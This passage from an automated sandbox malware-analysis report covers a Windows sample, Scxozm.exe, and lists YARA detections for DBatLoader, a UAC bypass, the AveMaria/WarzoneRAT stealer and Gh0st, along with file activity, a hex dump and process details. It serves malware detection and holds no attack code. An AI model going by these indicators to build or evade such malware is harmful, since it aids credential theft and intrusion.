00000016.00000003.393212324.0000000004D3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.402893922.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.374078638.0000000004C0C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.401943428.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000016.00000002.420712340.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.372662160.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.398438534.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.376754934.0000000004C3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.389050386.0000000004C14000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.396347292.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.384725664.0000000004C3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.372225220.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.389998532.0000000004D38000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.387827442.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.380615611.0000000004C3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370021498.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.399220875.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.389133615.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.391522517.0000000004D38000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370982630.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:

00000016.00000003.412073437.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000016.00000002.423200346.000000007FDE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.391692370.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.375566239.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.371241740.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.371833062.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.389348347.0000000004C14000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.411101868.0000000004D08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.394625130.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000002.422084507.0000000004D84000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.403586175.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.376170301.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000016.00000002.421407674.00000000047F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.392525516.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.385384266.0000000004C14000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.372028219.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.407316854.0000000004D0C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.401276763.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.399000136.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.411887679.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.390181676.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.377251063.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.375037498.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.410111551.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.397517112.0000000004D3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.404252015.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.390732789.0000000004D0C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.384233892.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.389387011.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.387974586.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.389751987.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.395299041.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.371520631.0000000004C0C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.385560883.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370903932.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.382164127.0000000004C3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.399574658.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370218388.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.387887634.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.381557055.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.386654845.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.397731251.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.371911369.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388739656.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.394357145.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.372353790.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Copyright Joe Security LLC 2022 Page 69 of 74
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388674725.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.378973615.0000000004C0C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.400243392.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.369768088.0000000002AB8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.378787871.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.411786772.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.395490683.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.403360488.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.404033288.0000000004D08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.381327974.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.386393560.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.412007859.0000000004D08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388275126.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.397005961.0000000004D3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.395839705.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.390878813.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.397183067.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.376419934.0000000004C0C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.399935707.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security

File Activities
File Created
File Path Access Attributes Options Completion Count Source Address Symbol

C:\Users\user read data or list device directory file | object name collision 1 28442FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point

C:\Users\user\AppData\Local read data or list device directory file | object name collision 1 28442FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point

C:\Users\user\AppData\Local\Mi read data or list device directory file | object name collision 1 28442FC InternetOpen
crosoft\Windows\INetCache directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point

C:\Users\user read data or list device directory file | object name collision 1 28442FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point

C:\Users\user\AppData\Local\Mi read data or list device directory file | object name collision 1 28442FC InternetOpen
crosoft\Windows\INetCookies directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point

File Path Access Attributes Options Completion Count Source Address Symbol

C:\Users\user read data or list device directory file | object name collision 1 28442FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point

C:\Users\user\AppData\Local\Microsoft\Windows\History read data or list device directory file | object name collision 1 28442FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point

File Written
File Path Offset Length Value Ascii Completion Count Source Address Symbol

C:\Users\user\AppData\Local\Mi 0 1024 fd 24 5a fd 39 fd fd fd fd $Z9557U~?W7W2: success or wait 358 28445B9 InternetReadFile

crosoft\Windows\INetCache\IE\C fd fd fd 35 35 fd 82 fd fd <<88>,<88.CCQNUN
S6IXJW6\Scxozmyplhmqutylctxlkg fd fd fd fd fd 0a fd fd fd fd UNUo|UUtUUU.U^UUULU
lsugzstqx[1] fd fd fd fd fd fd fd fd fd fd UJU3UUUUN>U
fd fd fd fd fd fd fd fd fd fd xU/UPU/^UUxUU/UU2N
fd fd fd fd fd fd fd fd fd fd
fd fd 37 fd fd fd 55 fd fd fd
7e 3f 03 57 fd 37 16 03
57 1e 32 fd fd fd 3a 3c fd
fd 3c fd fd 57 38 38 fd 3e
fd 2c fd fd 3c fd 38 fd 38
fd 0e fd fd e5 2e fd fd 43
43 fd fd fd fd fd fd fd fd 8a
fd 51 16 4e eb 55 4e eb
55 4e eb 55 fd 6f 7c 55 fd
eb 55 fd fd 74 55 fd eb 55
fd fd fd 55 2e eb 55 fd fd
5e 55 fd eb 55 fd 17 fd 55
4c eb 55 fd 17 fd 55 4a
eb 55 fd 17 33 55 fd eb
55 fd 17 fd 55 fd eb 55 4e
fd 3e 55 78 6b 55 2f fd fd
55 50 eb 55 2f fd 5e 55 fd
eb 55 fd 01 78 55 fd eb
55 2f fd fd 55 fd eb 55 1c
fd fd 32 4e eb

File Read
File Path Offset Length Completion Count Source Address Symbol

C:\Users\Public\Libraries\Scxozm.exe unknown 818176 success or wait 1 4034F5 ReadFile

C:\Users\Public\Libraries\Scxozm.exe unknown 818176 success or wait 1 283311D ReadFile

Analysis Process: rdpvideominiport.sys PID: 4, Parent PID: -1

General
Target ID: 27

Start time: 15:51:48

Start date: 25/07/2022

Path: C:\Windows\System32\drivers\rdpvideominiport.sys

Wow64 process (32bit): false

Commandline:

Imagebase: 0x7ff7338d0000

File size: 30616 bytes

MD5 hash: 0600DF60EF88FD10663EC84709E5E245

Has elevated privileges:

Has administrator
privileges:

Programmed in: C, C++ or other language

Analysis Process: WerFault.exe PID: 3708, Parent PID: 5528

General
Target ID: 28

Start time: 15:51:48

Start date: 25/07/2022

Path: C:\Windows\SysWOW64\WerFault.exe

Wow64 process (32bit): true

Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 356

Imagebase: 0xb60000

File size: 434592 bytes

MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B

Has elevated privileges: true

Has administrator true

privileges:

Programmed in: C, C++ or other language

Analysis Process: rdpdr.sys PID: 4, Parent PID: -1

General
Target ID: 29

Start time: 15:51:50

Start date: 25/07/2022

Path: C:\Windows\System32\drivers\rdpdr.sys

Wow64 process (32bit):

Commandline:

Imagebase:

File size: 182784 bytes

MD5 hash: 52A6CC99F5934CFAE88353C47B6193E7

Has elevated privileges:

Has administrator
privileges:

Programmed in: C, C++ or other language

Analysis Process: tsusbhub.sys PID: 4, Parent PID: -1

General
Target ID: 31

Start time: 15:51:51

Start date: 25/07/2022

Path: C:\Windows\System32\drivers\tsusbhub.sys

Wow64 process (32bit):

Commandline:

Imagebase:

File size: 126464 bytes

MD5 hash: 3A84A09CBC42148A0C7D00B3E82517F1

Has elevated privileges:

Has administrator
privileges:

Programmed in: C, C++ or other language

Analysis Process: Scxozm.exe PID: 3676, Parent PID: 5768

General
Target ID: 34

Start time: 15:51:53

Start date: 25/07/2022

Path: C:\Users\Public\Libraries\Scxozm.exe

Wow64 process (32bit): true

Commandline: C:\Users\Public\Libraries\Scxozm.exe

Imagebase: 0x400000

File size: 818176 bytes

MD5 hash: C9EE1D6A90BE7524B01814F48B39B232

Has elevated privileges: true

Has administrator true

privileges:

Programmed in: C, C++ or other language

Yara matches: Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:

00000022.00000000.386984616.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000022.00000000.388620739.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000022.00000002.400445769.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000022.00000000.389698244.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source:
00000022.00000002.397902948.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000022.00000002.397902948.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source:
00000022.00000002.397902948.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000022.00000002.397902948.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000022.00000002.397902948.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000022.00000002.397902948.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via
IExecuteCommand COM object, Source: 00000022.00000002.397902948.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author:
ditekSHen
Rule: MALWARE_Win_WarzoneRAT, Description: Detects AveMaria/WarzoneRAT, Source:
00000022.00000002.397902948.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source:
00000022.00000002.397902948.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Rule: AveMaria_WarZone, Description: unknown, Source:
00000022.00000002.397902948.0000000000660000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source:
00000022.00000002.399608201.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source:
00000022.00000002.399608201.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source:
00000022.00000002.399608201.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via
IExecuteCommand COM object, Source: 00000022.00000002.399608201.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Author:
ditekSHen
Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source:
00000022.00000002.399608201.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Rule: AveMaria_WarZone, Description: unknown, Source:
00000022.00000002.399608201.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000022.00000002.399991867.0000000000AF4000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000022.00000002.399991867.0000000000AF4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000022.00000002.396530793.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000022.00000000.390562993.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000022.00000000.388015852.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000022.00000000.389161104.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Analysis Process: Scxozm.exe PID: 3108, Parent PID: 1384

General
Target ID: 35

Start time: 15:52:05

Start date: 25/07/2022

Path: C:\Users\Public\Libraries\Scxozm.exe

Wow64 process (32bit): true

Commandline: C:\Users\Public\Libraries\Scxozm.exe

Imagebase: 0x400000

File size: 818176 bytes

MD5 hash: C9EE1D6A90BE7524B01814F48B39B232

Has elevated privileges: true

Has administrator true

privileges:

Programmed in: C, C++ or other language

Yara matches: Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:

00000023.00000000.413545623.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000023.00000000.415222738.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000023.00000000.416062731.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000023.00000000.414631753.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000023.00000000.417214823.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source:
00000023.00000002.422089797.0000000000AE4000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source:
00000023.00000002.422089797.0000000000AE4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000023.00000002.420560870.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source:
00000023.00000002.421819823.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
